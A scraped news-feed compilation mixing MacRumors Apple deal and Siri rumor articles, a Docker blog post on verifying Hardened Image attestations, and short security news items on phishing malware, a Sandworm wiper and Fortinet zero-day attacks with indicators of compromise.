1TB Wi-Fi - $1,499.99 ($99 off)
1TB Nano-Texture Glass Wi-Fi - $1,576.00 ($123 off)
2TB Wi-Fi - $1,851.00 ($148 off)
2TB Nano-Texture Glass Wi-Fi - $1,999.00 ($100 off)
13-Inch M5 iPad Pro

256GB Wi-Fi - $1,149.99 ($149 off)
512GB Wi-Fi - $1,349.99 ($149 off)
1TB Wi-Fi - $1,696.91 ($202 off)

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Apple's M5 iPad Pro Hits Multiple Record Low Prices on Amazon" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Here's When Apple Plans to Unveil a New Siri Powered by Google Gemini

Apple plans to unveil a more personalized version of Siri powered by Google Gemini next month, according to Bloomberg's Mark Gurman.


"The company has been planning an announcement of the new Siri in the second half of February, when it will give demonstrations of the functionality," he wrote, in the latest edition of his weekly Power On newsletter today.

Gurman does not yet know if Apple plans to hold a full-out event to demonstrate the Siri upgrades, or if it will hold private briefings with the media.

The more personalized Siri will be part of iOS 26.4, which will be available in beta in February and released to the general public in March or early April, according to Gurman. Based on that timeframe, the new-and-improved Siri should be available to all customers with an iPhone 15 Pro or newer in just a few more months.

As previewed by Apple, the assistant "should be able to tap into personal data and on-screen content to fulfill tasks," according to Gurman.

Apple first announced the more personalized version of Siri all the way back at WWDC 2024, but it was eventually delayed. At the time, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps, as one example of a new capability.

The revamped Siri reportedly experienced issues inside Apple, leading the company to turn to Google Gemini. The revamped Siri will technically still run on a new Apple Intelligence model that has Gemini's technology baked in.

Siri will reportedly get even better on iOS 27, as Apple is said to be planning to turn the assistant into a full-out chatbot, allowing users to have sustained, back-and-forth conversations with the assistant. This will essentially turn Siri into ChatGPT or Gemini, except it will be built right into the iPhone, iPad, and Mac, with no app required.

Gurman said the Siri chatbot will be "competitive with Gemini 3," and "significantly more capable" than the more personalized Siri coming with iOS 26.4.

Related Roundups: iOS 26, iPadOS 26Tags: Gemini, Google, Mark Gurman, SiriRelated Forum: iOS 26
This article, "Here's When Apple Plans to Unveil a New Siri Powered by Google Gemini" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Making the Most of Your Docker Hardened Images Enterprise Trial – Part 2

Verifying Security and Compliance of Docker Hardened Images
In Part 1 of this series, we migrated a Node.js service to Docker Hardened Images (DHI) and measured impressive results: 100% vulnerability elimination, 90% package reduction, and 41.5% size decrease. We extracted the SBOM and saw compliance labels for FIPS, STIG, and CIS.
The numbers look compelling. But how do you verify these claims independently?
Security tools earn trust through verification, not promises. When evaluating a security product for production, you need cryptographic proof. This is especially true for images that form the foundation of every container you deploy.This post walks through the verification process: signature validation, provenance analysis, compliance evidence examination, and SBOM analysis. We’ll focus on practical verification you can run during your trial, with links to the official DHI documentation for deeper technical details. By the end, you’ll have independently confirmed DHI’s security posture and built confidence for a production scenario.

Understanding Security Attestations available with Docker Hardened Images
Before diving into verification, you need to understand what you’re verifying.
Docker Hardened Images include attestations: cryptographically-signed metadata about the image’s build process, contents, and compliance posture. These are signed statements that can be independently verified.
Important: If you’ve pulled the image locally, you need to use the registry:// prefix when working with attestations. This tells Docker Scout to look for attestations in the registry, not just the local image cache.
List all attestations for your hardened image:
docker scout attestation list registry://<your-org-namespace>/dhi-node:24.11-debian13-fips This shows 16 different attestation types:
https://slsa.dev/provenance/v0.2 SLSA provenance https://docker.com/dhi/fips/v0.1 FIPS compliance https://docker.com/dhi/stig/v0.1 STIG scan https://cyclonedx.org/bom/v1.6 CycloneDX SBOM https://spdx.dev/Document SPDX SBOM https://scout.docker.com/vulnerabilities Scout vulnerabilities https://scout.docker.com/secrets/v0.1 Scout secret scan https://scout.docker.com/virus/v0.1 Scout virus/malware https://scout.docker.com/tests/v0.1 Scout test report https://openvex.dev/ns/v0.2.0 OpenVEX ... Each attestation is a JSON document describing a specific aspect of the image. The most critical attestations for verification:
SLSA provenance: Build source, builder identity, and build process details SBOM: Complete software bill of materials FIPS compliance: Evidence of FIPS 140-3 certified cryptographic modules STIG scan: Security Technical Implementation Guide compliance results Vulnerability scan: CVE assessment VEX report: CVE exploitability These attestations follow the in-toto specification, an open framework for supply chain security. Each attestation includes:
Subject: What the attestation describes (the container image) Predicate: The actual claims (FIPS certified, STIG compliant, etc.) Signature: Cryptographic signature from the builder Let’s see how you can verify the signatures yourself.
Verifying Attestations with Docker Scout
The attestations we’re about to examine are cryptographically signed by Docker’s build infrastructure. Docker Scout provides a simple, integrated approach that handles DHI attestations natively and without the hassle of managing public keys or certificate chains.To validate an attestation, simply append the –verify flag, which provides explicit validation feedback. This process relies on cryptographic hashing: the digest is a hash of the attestation content, so even a single character change completely alters the hash. Moreover, the attestation’s signature is cryptographically bound to the specific image digest it describes, guaranteeing that the metadata you’re verifying corresponds exactly to the image you have and preventing substitution attacks.
Retrieving an Attestation
To extract a specific attestation (like SLSA provenance), use the attestation get command with the full predicate type URI:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \ --predicate-type https://slsa.dev/provenance/v0.2 \ --output provenance.json Success looks like this:
✓ SBOM obtained from attestation, 32 packages found ✓ Provenance obtained from attestation ✓ Report written to provenance.json The checkmarks confirm Docker Scout successfully retrieved and verified the attestation. Behind the scenes, Scout validated:
The attestation signature matches Docker’s signing key The signature hasn’t expired The attestation applies to this specific image digest The attestation hasn’t been tampered with If signature verification fails, Scout returns an error and won’t output the attestation file.To learn more about available predicate types, check out the DHI verification documentation.
Validating SLSA Provenance
Signatures prove attestations are authentic. Provenance shows where the image came from.
SLSA (Supply-chain Levels for Software Artifacts) is a security framework developed by Google, the Linux Foundation, and other industry partners. It defines levels of supply chain security maturity, from SLSA 0 (no guarantees) to SLSA 4 (highest assurance).
Docker Hardened Images target SLSA 3, which requires:
Build process fully scripted/automated All build steps defined in version control Provenance generated automatically by build service Provenance includes source, builder, and build parameters Using our previously extracted SLSA provenance.json, we can check the source repository and commit hash:
jq '.predicate.invocation.environment.github_repository' provenance.json Output:
"docker-hardened-images/definitions" jq '.predicate.invocation.environment.github_sha1' provenance.json Output:
"698b367344efb3a7d443508782de331a84216ae4" Similarly, you can see exactly what GitHub Actions workflow produced this image.
jq '.predicate.builder.id' provenance.json Output:
“https://github.com/docker-hardened-images/definitions/actions/runs/18930640220/attempts/1”
For DHI Enterprise Users: Verifying High-Assurance Claims
While the free hardened images are built with security best practices, DHI Enterprise images carry the specific certifications required for FedRAMP, HIPAA, and financial audits. Here is how to verify those high-assurance claims.
FIPS 140-3 Validation
FIPS (Federal Information Processing Standard) 140-3 is a U.S. government standard for cryptographic modules. Think of it as a certification that proves the cryptography in your software has been tested and validated by independent labs against federal requirements.
If you’re building software for government agencies, financial institutions, or healthcare providers, FIPS compliance is often mandatory: without it, your software can’t be used in those environments!
Check if the image includes FIPS-certified cryptography:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \ --predicate-type https://docker.com/dhi/fips/v0.1 \ --output fips-attestation.json Output:
{ "certification": "CMVP #4985", "certificationUrl": "https://csrc.nist.gov/projects/cryptographic-module-validation-program/certificate/4985", "name": "OpenSSL FIPS Provider", "package": "pkg:dhi/[email protected]", "standard": "FIPS 140-3", "status": "active", "sunsetDate": "2030-03-10", "version": "3.1.2" } The certificate number (4985) is the key piece. This references a specific FIPS validation in the official NIST CMVP database.
STIG Compliance
STIG (Security Technical Implementation Guide) is the Department of Defense’s (DoD) checklist for securing systems. It’s a comprehensive security configuration standard needed for deploying software for defense or government work.
DHI images undergo STIG scanning before release. Docker uses a custom STIG based on the DoD’s General Operating System Security Requirements Guide. Each scan checks dozens of security controls and reports findings. You can extract and review STIG scan results:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \ --predicate-type https://docker.com/dhi/stig/v0.1 \ --output stig-attestation.json Check the STIG scan summary:
jq '.predicate[0].summary' stig-attestation.json Output:
{ "failedChecks": 0, "passedChecks": 91, "notApplicableChecks": 107, "totalChecks": 198, "defaultScore": 100, "flatScore": 91 } This shows DHI passed all 91 applicable STIG controls with zero failed checks and a 100% score. The 107 “notApplicableChecks” typically refer to controls that are irrelevant to the specific minimal container environment or its configuration. For a complete list of STIG controls and DHI compliance details, including how to extract and view the full STIG scan report, see the DHI STIG documentation.
CIS Benchmark Hardening
CIS (Center for Internet Security) Benchmarks are security configuration standards created by security professionals across industries. Much like STIGs, they represent consensus best practices, but unlike government-mandated frameworks (FIPS, STIG), CIS benchmarks are community-developed.
CIS compliance isn’t legally required, but it demonstrates you’re following industry-standard security practices—valuable for customer trust and audit preparation.
You can verify CIS compliance through image labels:
docker inspect <your-org-namespace>/dhi-node:24.11-debian13-fips | \ jq '.[0].Config.Labels["com.docker.dhi.compliance"]' Output: “fips,stig,cis”
The CIS label indicates that an image is hardened according to the CIS Docker Benchmark.
What exactly is a SBOM used for?
Compliance frameworks tell you what standards you meet. The SBOM tells you what’s actually in your container—and that’s where the real security work begins.
Identifying Transitive Dependencies
When you add a package to your project, you see the direct dependency. What you don’t see: that package’s dependencies, and their dependencies, and so on. This is the transitive dependency problem.
A vulnerability in a transitive dependency you’ve never heard of can compromise your entire application. Real example: the Log4Shell vulnerability affected millions of applications because Log4j was a transitive dependency buried several levels deep in dependency chains.
Most vulnerabilities hide in transitive dependencies because:
Developers don’t know they exist They’re not updated when the direct dependency updates Scanning tools miss them without an SBOM Minimal images reduce this risk dramatically. Fewer packages = fewer transitive dependencies = smaller attack surface.
Compare dependency counts:
Official Node.js image: 321 packages, ~1,500 dependency relationships DHI Node.js image: 32 packages, ~150 dependency relationships 90% reduction in packages means 90% reduction in transitive dependency risk.
Scanning for Known (Exploitable) Vulnerabilities
With the SBOM extracted, scan for known vulnerabilities:
docker scout cves registry://<your-org-namespace>/dhi-node:24.11-debian13-fips Output:
Target: <your-org-namespace>/dhi-node:24.11-debian13-fips 0C 0H 0M 8L 8 vulnerabilities found in 2 packages CRITICAL 0 HIGH 0 MEDIUM 0 LOW 8 Zero critical, high, or medium severity vulnerabilities. Docker Scout cross-references the SBOM against multiple vulnerability databases (NVD, GitHub Security Advisories, etc.).This is the payoff of minimal images: fewer packages means fewer potential vulnerabilities. The official Node.js image had 25 CVEs across CRITICAL, HIGH, and MEDIUM severities. The hardened version has zero actionable vulnerabilities—not because vulnerabilities were patched, but because vulnerable packages were removed entirely.
Understanding Exploitability with VEX
Not all CVEs are relevant to your deployment. A vulnerability in a library function your application never calls, or a flaw in a service that isn’t running, doesn’t pose real risk. Docker Hardened Images include signed VEX attestations that identify which reported CVEs are not actually exploitable in the image’s runtime context. This helps you distinguish between CVEs that exist in a package (reported), and CVEs that can actually be exploited given how the package is used in this specific image (exploitable). In other words, VEX reduces false positives.
Docker Scout applies VEX statements automatically when scanning DHI images: when you run docker scout cves, Scout uses VEX attestations to suppress vulnerabilities marked as non-exploitable.
You can see which CVEs have been evaluated with this command:
docker scout attestation get registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \ --predicate-type https://openvex.dev/ns/v0.2.0 \ --output vex.json License Compliance Analysis
When you use open source software, you’re bound by license terms. Some licenses (MIT, Apache) are permissive and you can use them freely, even in commercial products. Others (GPL, AGPL) are copyleft: they require you to release your source code if you distribute software using them.
SBOMs make license compliance visible. Without an SBOM, you’re blind to what licenses your containers include.
Export the SBOM in SPDX format:
docker scout sbom registry://<your-org-namespace>/dhi-node:24.11-debian13-fips \ --format spdx \ --output node-sbom-spdx.json Analyze license distribution:
jq '.packages[].licenseConcluded' node-sbom-spdx.json | \ sort | uniq -c | sort -rn Output:
15 "MIT" 8 "Apache-2.0" 5 "GPL-2.0-or-later" 2 "BSD-3-Clause" 1 "OpenSSL" 1 "NOASSERTION" In this example:
✅ MIT and Apache-2.0 are permissive (safe for commercial use) ⚠️ GPL-2.0-or-later requires review (is this a runtime dependency or build tool?) ⚠️ NOASSERTION needs investigation Conclusion: What You’ve Proven
You’ve independently verified critical security claims Docker makes about Hardened Images:
Authenticity: Cryptographic signatures prove images are genuine and unmodified Provenance: SLSA attestations trace builds to specific source commits in public repositories
Compliance: FIPS certificate, STIG controls passed, and CIS benchmarks met Security posture Every claim you verified (except CIS) has a corresponding attestation you can check yourself, audit, and validate in your CI/CD pipeline.
You can customize a Docker Hardened Image (DHI) to suit your specific needs using the Docker Hub UI. This allows you to select a base image, add packages, add OCI artifacts (such as custom certificates or additional tools), and configure settings. In addition, the build pipeline ensures that your customized image is built securely and includes attestations.
In Part 3, we’ll cover how to customize Docker Hardened Images to suit your specific needs, while keeping all the benefits we just explored.
You’ve confirmed DHI delivers on security promises. Next, we’ll make it operational.

If you missed reading part 1, where we discussed how you can get to 100% vulnerability elimination and 90% package reduction, read the blog here.

View the full article
reporter

Top Stories: iPhone 18 Pro Leaks, Siri Chatbot, Apple AI Pin, and More

Apple rumors are starting to pick up now that we're a few weeks into 2026, and this week saw some potential clarity around conflicting iPhone 18 Pro rumors, plus some new word on Apple's plans for Siri.


This week also saw a report that Apple is working on some sort of AI pin while also making progress toward a major MacBook Pro revamp, so read on below for all the details!

Top Stories

iPhone 18 Pro Leak: Smaller Dynamic Island, No Top-Left Camera Cutout

Over the last few months, rumors around the iPhone 18 Pro's front-panel design have been conflicted, with some supply chain leaks pointing to under-display Face ID, reports suggesting a top-left hole-punch camera, and debate over whether the familiar Dynamic Island will shrink, shift, or disappear entirely.


According to frequent Weibo-based leaker Instant Digital, however, early reports from Chinese and Korean sources about the possible relocation of an infrared Face ID component were later mistranslated in some English-language coverage, leading to incorrect claims of a hole-punch camera. In fact, the Dynamic Island will remain on the iPhone 18 Pro and simply be roughly 35% narrower. That smaller Dynamic Island interpretation has also been corroborated by respected display analyst Ross Young.

Apple's OLED MacBook Pro Launch Moves Closer With Panel Production

Rumors have been pointing toward Apple launching a revamped MacBook Pro with OLED displays late this year or early next year, and things appear to have taken a step forward this month with a report claiming that Samsung's production line that will produce displays for the new laptop has gone into operation.


The MacBook Pro is just one of five Apple products expected to gain OLED displays in the next few years as Apple continues to adopt the more advanced display technology.

Before the MacBook Pro gets OLED displays, there's still another update to the current version in the works to add M5 Pro and M5 Max chips. with rumors and shipping delays suggesting a launch could be coming fairly soon.

A Siri Chatbot is Coming in iOS 27

Apple plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT, Bloomberg reported this week. Apple did not initially plan to introduce a chatbot, but their popularity forced Apple executives to reconsider.


Codenamed Campos, the ‌Siri‌ chatbot will be integrated into iOS 27, iPadOS 27, and macOS 27, replacing the current version of ‌Siri‌. It will have the same natural language conversation functionality as chatbots like ChatGPT, and it will be accessible by using the "‌Siri‌" wake word or by holding down the side button on an iPhone or iPad.

The chatbot version of Siri arriving in iOS 27 later this year will follow the initial upgrade to a more personalized version of the current Siri that we expect to arrive in just a few months with iOS 26.4.

Apple's Next iPhone: What to Expect From the 2026 iPhone 17e

We're likely just weeks away from Apple's next iPhone launch, with the company set to introduce the ‌iPhone‌ 17e. The ‌iPhone‌ 17e is a follow-up to the iPhone 16e that came out in February 2025, and rumors suggest that it could have some welcome improvements.


Check out our recap of all the rumors we've heard about the next version of Apple's cheapest iPhone model to help decide if it might be the right one for you.

Apple Developing AirTag-Sized AI Pin With Dual Cameras

Apple is working on a small, wearable AI pin equipped with multiple cameras, a speaker, and microphones, reports The Information. If it actually launches, the AI pin will likely run the new Siri chatbot that Apple plans to unveil in iOS 27.


The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape. It has an aluminum and glass shell, and two cameras at the front. There is a standard lens and a wide-angle lens that are meant to capture photos and videos, while three microphones are designed to pick up sound around the wearer. An included speaker allows the pin to play audio, and there is a physical control button along one edge. The device is able to wirelessly charge like an Apple Watch.

iPhone 18 Rumored to Feature Much Brighter Display

Apple's iPhone 18 will feature a significantly brighter display, according to a Chinese leaker.


In a post this week on Weibo, the user known as Instant Digital said that Chinese supplier BOE has little hope of making panels for the ‌iPhone 18‌ because Apple's brightness requirements for the next-generation device are unprecedentedly high. This suggests that the ‌iPhone 18‌'s display will see a considerable leap forward in terms of brightness.

While the iPhone 18 Pro and Pro Max are expected to launch in the usual September time frame, the regular iPhone 18‌ isn't expected to launch until early 2027.

MacRumors Newsletter

Each week, we publish an email newsletter like this highlighting the top Apple stories, making it a great way to get a bite-sized recap of the week hitting all of the major topics we've covered and tying together related stories for a big-picture view.

So if you want to have top stories like the above recap delivered to your email inbox each week, subscribe to our newsletter!Tag: Top Stories
This article, "Top Stories: iPhone 18 Pro Leaks, Siri Chatbot, Apple AI Pin, and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More

This week saw a wide range of Apple-related deals, including some of the lowest prices we've seen in months on the Apple Studio Display, plus solid discounts on the M4 Mac mini, Mac-compatible monitors from Samsung, popular desktop accessories from Satechi, and even more.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Amazon Sale


What's the deal? Take up to $450 off popular accessories
Where can I get it? Amazon
Where can I find the original deal? Right here
$450 OFFEcovacs Deebot T80 Pro Robot Vacuum for $549.99
$350 OFFEcovacs Deebot X8 Pro Robot Vacuum for $749.00

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Ecovacs Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Ecovacs Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
Anker 3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
Anker 14-Port Prime Docking Station - $169.99, down from $269.99
Anker SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
Jackery Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Jackery Explorer 1500 Portable Power Station - $898.99, down from $1,399.00

Apple Studio Display


What's the deal? Take up to $450 off Apple Studio Display
Where can I get it? Woot
Where can I find the original deal? Right here
UP TO $450 OFFApple Studio Display at Woot

Woot this week started a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one year Apple limited warranty, but there are other items that are refurbished.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter, down from $1,599.00, and also include all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

Mac Mini


What's the deal? Take up to $130 off M4 Mac mini
Where can I get it? Amazon
Where can I find the original deal? Right here
$100 OFFM4 Mac mini (256GB) for $499.00
$110 OFFM4 Mac mini (16GB/512GB) for $689.00
$109 OFFM4 Mac mini (24GB/512GB) for $889.99
$130 OFFM4 Pro Mac mini (24GB/512GB) for $1,269.00

Amazon this week has a few models of Apple's M4 Mac mini on sale at low prices, starting at $499.99 for the model with 16GB RAM/256GB SSD, down from $599.00. Discounts reach up to $130 off in these sales, and this time around there is also a discount on the M4 Pro model.

Satechi


What's the deal? Take 20% off Satechi's new products
Where can I get it? Satechi
Where can I find the original deal? Right here
Note: Use code CES2026 to see this discount.
UP TO 20% OFFSatechi's CES 2026 Sale
Note: Use code REFRESH20 to see this discount.
20% OFFSatechi's Refresh 2026 Sale

Satechi announced a few products at CES this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.

Additionally, Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Desk Refresh Collection."

Samsung


What's the deal? Save on Samsung monitors and TVs
Where can I get it? Samsung
Where can I find the original deal? Right here
$300 OFF32-inch Smart Monitor M9 for $1,299.99
$600 OFF65-inch The Frame for $1,199.99
$1,200 OFF75-inch The Frame Pro for $1,999.99

Samsung recently introduced a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware

A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT. "The attack begins with social engineering lures delivered via business-themed documents crafted to appear routine and benign," Fortinet FortiGuard Labs researcher Cara Lin said in a technical breakdown published this week. "These documents andView the full article
Hacker News

New DynoWiper Malware Used in Attempted Sandworm Attack on Polish Power Sector

The Russian nation-state hacking group known as Sandworm has been attributed to what has been described as the "largest cyber attack" targeting Poland's power system in the last week of December 2025. The attack was unsuccessful, the country's energy minister, Milosz Motyka, said last week. "The command of the cyberspace forces has diagnosed in the last days of the year the strongest attack onView the full article
Hacker News

Who Approved This Agent? Rethinking Access, Accountability, and Risk in the Age of AI Agents

AI agents are accelerating how work gets done. They schedule meetings, access data, trigger workflows, write code, and take action in real time, pushing productivity beyond human speed across the enterprise. Then comes the moment every security team eventually hits: “Wait… who approved this?” Unlike users or applications, AI agents are often deployed quickly, shared broadly,View the full article
Hacker News

CISA Adds Actively Exploited VMware vCenter Flaw CVE-2024-37079 to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw affecting Broadcom VMware vCenter Server that was patched in June 2024 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability in question is CVE-2024-37079 (CVSS score: 9.8), which refers to a heap overflow in theView the full article
Hacker News

Securing the Move: AWS Cloud Migration and Beyond

Cloud migration is often viewed through the lens of efficiency and cost-savings. While these are valid drivers, the most successful migrations are those that prioritize a “Security-by-Design” architecture. Leveraging aws cloud migration services allows businesses to move workloads with minimal downtime, but the transition period itself is a high-risk window for data exposure.
As you shift from on-premises legacy systems to the elastic nature of AWS, your security perimeter changes. You are no longer just guarding a physical server; you are managing identity access, encrypted data flows, and misconfigured S3 buckets.
The Hybrid Security Approach
In 2026, the most resilient enterprises adopt a multi-layered defense strategy. This involves:
Phased Migration: Moving non-critical workloads first to test security protocols. Continuous Monitoring: Using AI-driven tools to detect anomalies in real-time. Proactive Testing: Validating that the new cloud environment is actually as secure as it was designed to be. Strengthening the Perimeter: Penetration Testing vs. Vulnerability Scanning
Once your migration is underway, the question shifts from how you move to how you protect. A common point of confusion for many IT managers is the difference between penetration testing vs vulnerability scanning. While they may sound similar, they serve two distinct functions in your security lifecycle.
FeatureVulnerability ScanningPenetration TestingNatureAutomated and scheduled.Manual and goal-oriented.GoalIdentifies known “holes” or missing patches.Simulates a real-world hacker to exploit gaps.FrequencyHigh (Weekly/Monthly).Low (Annually or after major changes).DepthSurface-level “snapshot” of risks.Deep-dive into exploitability and impact. Why You Need Both
Think of vulnerability scanning as a motion-sensor light on your house; it alerts you whenever something moves in the yard. It is essential for routine hygiene and meeting compliance standards like PCI DSS or SOC2.
Penetration testing, however, is like hiring a professional locksmith to see if they can actually pick your locks and get to the safe. In a cloud environment, a pen tester doesn’t just find an open port; they demonstrate how that port could be used to escalate privileges and exfiltrate sensitive customer data.
Conclusion: A Secure Future in the Cloud
A successful digital transformation requires a balance of speed and safety. By utilizing professional AWS cloud migration services, you ensure your infrastructure is scalable and modern. By integrating both vulnerability scanning and penetration testing, you ensure that your new digital home is fortified against the sophisticated threats of the modern era.
View the full article
reporter

Fortinet confirms new zero-day attacks against customer devices

Fortinet has confirmed that a new attack campaign observed recently against customer devices is exploiting an unpatched issue to bypass authentication. The new attacks are different from a previous campaign seen in December that targeted two vulnerabilities related to FortiCloud single sign-on (SSO) authentication.
“Recently, a small number of customers reported unexpected login activity occurring on their devices, which appeared very similar to the previous issue,” the Fortinet product security team said in a blog post. “However, in the last 24 hours, we have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a new attack path.”
Fortinet is currently working on fixing the new issue, which impacts not only FortiCloud SSO, but all SAML SSO implementations. It’s worth noting that FortiCloud SSO is not enabled by default on devices but can become enabled when an administrator registers the device with FortiCare product support from the device’s management interface.
Reports of similar attacks
Fortinet patched two improper cryptographic signature verification issues, CVE-2025-59718 and CVE-2025-59719, in December. These flaws could be exploited to bypass authentication on devices with FortiCloud SSO enabled by sending specially crafted SAML messages.
Soon after the patches were released, attackers reverse engineered them and launched a campaign to extract configuration files from vulnerable devices. Those files included hashed credentials for other user accounts and details that would allow network mapping.
This week, researchers from security firm Arctic Wolf reported seeing a new attack campaign that started around Jan. 15 in which attackers similarly extracted firewall configurations but also used their access to create new generic accounts and give VPN access to them.
The company noted at the time that it was unsure whether this activity was related to the two December vulnerabilities or to a new zero-day vulnerability. Fortinet has now confirmed the latter.
The December flaws affected FortiOS, FortiWeb, FortiProxy, and FortiSwitch Manager, so it’s reasonable to assume the new issue impacts the same devices.
The Fortinet blog post references the same indicators of compromise listed in the Arctic Wolf report, namely malicious accounts created with the email addresses [email protected] and [email protected]. Other admin accounts are created with the names: audit, backup, itadmin, secadmin, and support.
Mitigation
If these or other IOCs such as IP addresses are identified in configurations or the device logs, the system and its configuration should be considered compromised. Fortinet recommends updating the device to the latest available software release, restoring a configuration from a clean backup, and rotating all credentials, including any LDAP/AD accounts that may be connected to the FortiGate devices.
The setting “Allow administrative login using FortiCloud SSO” should be set to off, but if any third-party SSO systems are enabled they can still be abused. Administrative access should not be enabled from the Internet for network-edge devices, so Fortinet PSIRT shared a policy configuration that restricts access to the administrative interface only to specific subnets of IP addresses.
View the full article
CSOonline

Apple's Siri Chatbot in iOS 27: Everything We Know

Apple is planning to upgrade Siri twice in the coming year, adding personalization features in iOS 26.4 before turning the personal assistant into a full chatbot in iOS 27.


As long as timelines don't change, we'll see the ‌Siri‌ chatbot as soon as June 2026. Here's everything we know so far.

SiriBot

With iOS 27, Apple will change the way that ‌Siri‌ works. Right now, ‌Siri‌ can answer basic questions and complete simple tasks, but you can't engage it in a back and forth conversation, get help with multi-step tasks, or ask complicated questions.

Based on the current ‌Siri‌ chatbot rumors, ‌Siri‌ will be able to do all of that and more with the upcoming upgrade, and it will work like competing chatbots.

Apple wasn't initially planning to introduce a full chatbot that users can interact with similarly to Claude or ChatGPT, but chatbots have become too popular for Apple to ignore. Simply adding AI capabilities to apps and features isn't enough for Apple to stay competitive with the way people have embraced chatbots for everything from web searches to coding help.

Google has already integrated Gemini into a range of Android devices, and chatbots like ChatGPT have hundreds of millions of weekly active users.

Siri Capabilities

According to Bloomberg's Mark Gurman, ‌Siri‌'s chatbot capabilities will be "embedded deeply" into Apple's products at the system level. ‌Siri‌ won't be an app, but will instead be integrated into iOS, iPadOS, and macOS like ‌Siri‌ is now.

Siri Activation and Interface

Users will activate ‌Siri‌ in the same way they do today, speaking the ‌Siri‌ wake word or pressing on the side button of a Siri-enabled device. ‌Siri‌ will be able to respond to both voice and text-based requests.

We don't yet know what the new ‌Siri‌ interface will look like. Apple will need to make big changes to the way that ‌Siri‌ looks and feels if it wants to match functionality offered by companies like OpenAI, Anthropic, and Google.

People are used to opening up an app and having a full text interface that includes conversation history, and it's not clear how Apple will provide that if there's no dedicated ‌Siri‌ chatbot app. People will want to be able to access their past conversations and have tools for uploading files and images.

It's possible activating ‌Siri‌ could lead to an app-like interface that takes over the iPhone, iPad, or Mac's display, but that will be a departure from ‌Siri‌'s current minimalistic design. Apple could alternatively log conversations in a place like the Notes app, or in the clipboard on the Mac.

Gurman says that ‌Siri‌ won't be an app, but that might mean that it won't only be an app. There could be some kind of dedicated chatbot app that people can use, with ‌Siri‌ also able to be activated and used on a system level and in and across apps.
What Siri Chatbot Can Do

It sounds like the ‌Siri‌ chatbot will be able to do everything that current chatbots can do, and more.

Search the web for information
Generate images
Generate content
Summarize information
Analyze uploaded files
Use personal data to complete tasks
Ingest information from emails, messages, files and more
Analyze open windows and on-screen content to take action
Control device features and settings
Search for on-device content, replacing Spotlight

‌Siri‌ will also be integrated into Apple's core apps, including Mail, Messages, Apple TV, Xcode, and Photos. ‌Siri‌ will be able to search for specific images, edit photos, help with coding, make suggestions for TV shows and movies, and send emails.

iOS 26.4 "LLM Siri" vs. Chatbot Siri

In iOS 26.4, Apple plans to introduce a new, updated version of ‌Siri‌ that relies on large language models, or LLMs. Apple has been working on this version of ‌Siri‌ since Apple Intelligence features were added to iOS 18, but it was delayed because ‌Siri‌'s underlying architecture needed an overhaul to run LLMs.

Starting in iOS 26.4, ‌Siri‌ will be able to hold continuous conversations and provide human-like responses to questions, plus ‌Siri‌ will have new personalization features that will let it do more than before. What ‌Siri‌ won't have, though, is full chatbot capabilities. Here's what we're expecting:

Personal Context

With personal context, ‌Siri‌ will be able to keep track of emails, messages, files, photos, and more, learning more about you to help you complete tasks and keep track of what you've been sent.

Show me the files Eric sent me last week.
Find the email where Eric mentioned ice skating.
Find the books that Eric recommended to me.
Where's the recipe that Eric sent me?
What's my passport number?

Onscreen Awareness

